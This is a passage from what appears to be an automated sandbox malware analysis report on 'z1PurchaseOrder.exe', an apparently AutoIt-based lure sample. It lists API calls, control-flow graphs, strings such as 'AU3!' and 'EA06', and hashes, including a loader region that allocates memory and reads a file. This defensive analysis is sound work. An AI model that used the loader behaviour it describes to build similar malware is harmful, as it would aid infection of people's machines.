                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsThemeActive$uxtheme.dll
                                        • API String ID: 2574300362-3542929980
                                        • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                        • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                        • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                        • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                        • __wsplitpath.LIBCMT ref: 00410C61
                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                        • _wcsncat.LIBCMT ref: 00410C78
                                        • __wmakepath.LIBCMT ref: 00410C94
                                          • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        • _wcscpy.LIBCMT ref: 00410CCC
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                        • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                        • _wcscat.LIBCMT ref: 00429C43
                                        • _wcslen.LIBCMT ref: 00429C55
                                        • _wcslen.LIBCMT ref: 00429C66
                                        • _wcscat.LIBCMT ref: 00429C80
                                        • _wcsncpy.LIBCMT ref: 00429CC0
                                        • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\
                                        • API String ID: 1004883554-2276155026
                                        • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                        • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                        • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                        • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                        APIs
                                          • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                          • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                        • Sleep.KERNEL32(0000000A), ref: 00409870
                                        • timeGetTime.WINMM ref: 00409880
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BuffCharSleepTimeUpper_wcslentime
                                        • String ID:
                                        • API String ID: 3219444185-0
                                        • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                        • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                        • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                        • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1156 4161c2-4161d1 1157 4161d3-4161df 1156->1157 1158 4161fa 1156->1158 1157->1158 1159 4161e1-4161e8 1157->1159 1160 4161fd-416209 call 41aa31 1158->1160 1159->1158 1161 4161ea-4161f8 1159->1161 1164 416213-41621a call 416e29 1160->1164 1165 41620b-416212 call 41616a 1160->1165 1161->1160 1170 416224-416233 call 41843a call 41b669 1164->1170 1171 41621c-416223 call 41616a 1164->1171 1165->1164 1178 416235-41623c call 4117af 1170->1178 1179 41623d-416258 GetCommandLineW call 42235f call 4222b1 1170->1179 1171->1170 1178->1179 1186 416262-416269 call 422082 1179->1186 1187 41625a-416261 call 4117af 1179->1187 1192 416273-41627c call 41186e 1186->1192 1193 41626b-416272 call 4117af 1186->1193 1187->1186 1198 416285-41628d call 42203c 1192->1198 1199 41627e-416284 call 4117af 1192->1199 1193->1192 1204 416295-416297 1198->1204 1205 41628f-416293 1198->1205 1199->1198 1206 416298-4162a0 call 40d7f0 1204->1206 1205->1206 1208 4162a5-4162ab 1206->1208 1209 4162b3-41630f call 411a4b call 4171d1 1208->1209 1210 4162ad-4162ae call 411a1f 1208->1210 1210->1209
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                        • String ID:
                                        • API String ID: 2477803136-0
                                        • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                        • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                        • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                        • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_fseek_wcscpy
                                        • String ID: FILE
                                        • API String ID: 3888824918-3121273764
                                        • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                        • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                        • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                        • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32 ref: 00410326
                                        • RegisterClassExW.USER32 ref: 00410359
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                        • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                        • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                        • ImageList_ReplaceIcon.COMCTL32(00BF63C8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                        • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                        • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                        • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                        • LoadIconW.USER32(?,00000063), ref: 0041021F
                                        • LoadIconW.USER32(?,000000A4), ref: 00410232
                                        • LoadIconW.USER32(?,000000A2), ref: 00410245
                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                        • RegisterClassExW.USER32 ref: 004102C6
                                          • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                          • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                          • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                          • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                          • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                          • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                          • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00BF63C8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$PGH
                                        • API String ID: 423443420-3673556320
                                        • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                        • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                        • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                        • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                        Control-flow Graph

                                        APIs
                                        • _fseek.LIBCMT ref: 004525DA
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                        • __fread_nolock.LIBCMT ref: 00452618
                                        • __fread_nolock.LIBCMT ref: 00452629
                                        • __fread_nolock.LIBCMT ref: 00452644
                                        • __fread_nolock.LIBCMT ref: 00452661
                                        • _fseek.LIBCMT ref: 0045267D
                                        • _malloc.LIBCMT ref: 00452689
                                        • _malloc.LIBCMT ref: 00452696
                                        • __fread_nolock.LIBCMT ref: 004526A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                        • String ID:
                                        • API String ID: 1911931848-0
                                        • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                        • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                        • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                        • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 40f450-40f45c call 425210 1359 40f460-40f478 1356->1359 1359->1359 1360 40f47a-40f4a8 call 413990 call 410f70 1359->1360 1365 40f4b0-40f4d1 call 4151b0 1360->1365 1368 40f531 1365->1368 1369 40f4d3-40f4da 1365->1369 1370 40f536-40f540 1368->1370 1371 40f4dc-40f4de 1369->1371 1372 40f4fd-40f517 call 41557c 1369->1372 1373 40f4e0-40f4e2 1371->1373 1376 40f51c-40f51f 1372->1376 1375 40f4e6-40f4ed 1373->1375 1377 40f521-40f52c 1375->1377 1378 40f4ef-40f4f2 1375->1378 1376->1365 1381 40f543-40f54e 1377->1381 1382 40f52e-40f52f 1377->1382 1379 42937a-4293a0 call 41557c call 4151b0 1378->1379 1380 40f4f8-40f4fb 1378->1380 1393 4293a5-4293c3 call 4151d0 1379->1393 1380->1372 1380->1373 1383 40f550-40f553 1381->1383 1384 40f555-40f560 1381->1384 1382->1378 1383->1378 1386 429372 1384->1386 1387 40f566-40f571 1384->1387 1386->1379 1389 429361-429367 1387->1389 1390 40f577-40f57a 1387->1390 1389->1375 1392 42936d 1389->1392 1390->1378 1392->1386 1393->1370
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_fseek_strcat
                                        • String ID: AU3!$EA06
                                        • API String ID: 3818483258-2658333250
                                        • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                        • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                        • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                        • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1396 410130-410142 SHGetMalloc 1397 410148-410158 SHGetDesktopFolder 1396->1397 1398 42944f-429459 call 411691 1396->1398 1399 4101d1-4101e0 1397->1399 1400 41015a-410188 call 411691 1397->1400 1399->1398 1406 4101e6-4101ee 1399->1406 1408 4101c5-4101ce 1400->1408 1409 41018a-4101a1 SHGetPathFromIDListW 1400->1409 1408->1399 1410 4101a3-4101b1 call 411691 1409->1410 1411 4101b4-4101c0 1409->1411 1410->1411 1411->1408
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                        • String ID: C:\Users\user\Desktop\z1PurchaseOrder.exe
                                        • API String ID: 192938534-427703501
                                        • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                        • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                        • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                        • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1414 401230-40123b 1415 401241-401272 call 4131f0 call 401be0 1414->1415 1416 4012c5-4012cd 1414->1416 1421 401274-401292 1415->1421 1422 4012ae-4012bf KillTimer SetTimer 1415->1422 1423 42aa61-42aa67 1421->1423 1424 401298-40129c 1421->1424 1422->1416 1425 42aa8b-42aaa7 Shell_NotifyIconW 1423->1425 1426 42aa69-42aa86 Shell_NotifyIconW 1423->1426 1427 4012a2-4012a8 1424->1427 1428 42aaac-42aab3 1424->1428 1425->1422 1426->1422 1427->1422 1431 42aaf8-42ab15 Shell_NotifyIconW 1427->1431 1429 42aad7-42aaf3 Shell_NotifyIconW 1428->1429 1430 42aab5-42aad2 Shell_NotifyIconW 1428->1430 1429->1422 1430->1422 1431->1422
                                        APIs
                                        • _memset.LIBCMT ref: 00401257
                                          • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                          • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                          • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                          • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                        • KillTimer.USER32(?,?), ref: 004012B0
                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                        • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                        • String ID:
                                        • API String ID: 1792922140-0
                                        • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                        • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                        • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                        • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1432 40f4840-40f48ee call 40f2260 1435 40f48f5-40f491b call 40f5750 CreateFileW 1432->1435 1438 40f491d 1435->1438 1439 40f4922-40f4932 1435->1439 1440 40f4a6d-40f4a71 1438->1440 1447 40f4939-40f4953 VirtualAlloc 1439->1447 1448 40f4934 1439->1448 1441 40f4ab3-40f4ab6 1440->1441 1442 40f4a73-40f4a77 1440->1442 1444 40f4ab9-40f4ac0 1441->1444 1445 40f4a79-40f4a7c 1442->1445 1446 40f4a83-40f4a87 1442->1446 1449 40f4b15-40f4b2a 1444->1449 1450 40f4ac2-40f4acd 1444->1450 1445->1446 1451 40f4a89-40f4a93 1446->1451 1452 40f4a97-40f4a9b 1446->1452 1453 40f495a-40f4971 ReadFile 1447->1453 1454 40f4955 1447->1454 1448->1440 1457 40f4b2c-40f4b37 VirtualFree 1449->1457 1458 40f4b3a-40f4b42 1449->1458 1455 40f4acf 1450->1455 1456 40f4ad1-40f4add 1450->1456 1451->1452 1459 40f4a9d-40f4aa7 1452->1459 1460 40f4aab 1452->1460 1461 40f4978-40f49b8 VirtualAlloc 1453->1461 1462 40f4973 1453->1462 1454->1440 1455->1449 1465 40f4adf-40f4aef 1456->1465 1466 40f4af1-40f4afd 1456->1466 1457->1458 1459->1460 1460->1441 1463 40f49bf-40f49da call 40f59a0 1461->1463 1464 40f49ba 1461->1464 1462->1440 1472 40f49e5-40f49ef 1463->1472 1464->1440 1468 40f4b13 1465->1468 1469 40f4aff-40f4b08 1466->1469 1470 40f4b0a-40f4b10 1466->1470 1468->1444 1469->1468 1470->1468 1473 40f4a22-40f4a36 call 40f57b0 1472->1473 1474 40f49f1-40f4a20 call 40f59a0 1472->1474 1480 40f4a3a-40f4a3e 1473->1480 1481 40f4a38 1473->1481 1474->1472 1482 40f4a4a-40f4a4e 1480->1482 1483 40f4a40-40f4a44 CloseHandle 1480->1483 1481->1440 1484 40f4a5e-40f4a67 1482->1484 1485 40f4a50-40f4a5b VirtualFree 1482->1485 1483->1482 1484->1435 1484->1440 1485->1484
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040F4911
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040F4B37
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1698112253.00000000040F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F2000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40f2000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                        • Instruction ID: 4d60b71dcd8867b6bd64edb0c90210e26390f103abc17404c83cc8cfcfbf8c6c
                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                        • Instruction Fuzzy Hash: 5EA13A74E04209EBDB14CFA4C894BEEBBB5FF58304F208169E611BB680D779AA41CF55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1486 414f10-414f2c 1487 414f4f 1486->1487 1488 414f2e-414f31 1486->1488 1489 414f51-414f55 1487->1489 1488->1487 1490 414f33-414f35 1488->1490 1491 414f37-414f46 call 417f23 1490->1491 1492 414f56-414f5b 1490->1492 1502 414f47-414f4c call 417ebb 1491->1502 1494 414f6a-414f6d 1492->1494 1495 414f5d-414f68 1492->1495 1498 414f7a-414f7c 1494->1498 1499 414f6f-414f77 call 4131f0 1494->1499 1495->1494 1497 414f8b-414f9e 1495->1497 1500 414fa0-414fa6 1497->1500 1501 414fa8 1497->1501 1498->1491 1504 414f7e-414f89 1498->1504 1499->1498 1505 414faf-414fb1 1500->1505 1501->1505 1502->1487 1504->1491 1504->1497 1508 4150a1-4150a4 1505->1508 1509 414fb7-414fbe 1505->1509 1508->1489 1511 414fc0-414fc5 1509->1511 1512 415004-415007 1509->1512 1511->1512 1513 414fc7 1511->1513 1514 415071-415072 call 41e6b1 1512->1514 1515 415009-41500d 1512->1515 1516 415102 1513->1516 1517 414fcd-414fd1 1513->1517 1526 415077-41507b 1514->1526 1519 41500f-415018 1515->1519 1520 41502e-415035 1515->1520 1521 415106-41510f 1516->1521 1524 414fd3 1517->1524 1525 414fd5-414fd8 1517->1525 1527 415023-415028 1519->1527 1528 41501a-415021 1519->1528 1522 415037 1520->1522 1523 415039-41503c 1520->1523 1521->1489 1522->1523 1530 415042-41504e call 41453a call 41ed9e 1523->1530 1531 4150d5-4150d9 1523->1531 1524->1525 1532 4150a9-4150af 1525->1532 1533 414fde-414fff call 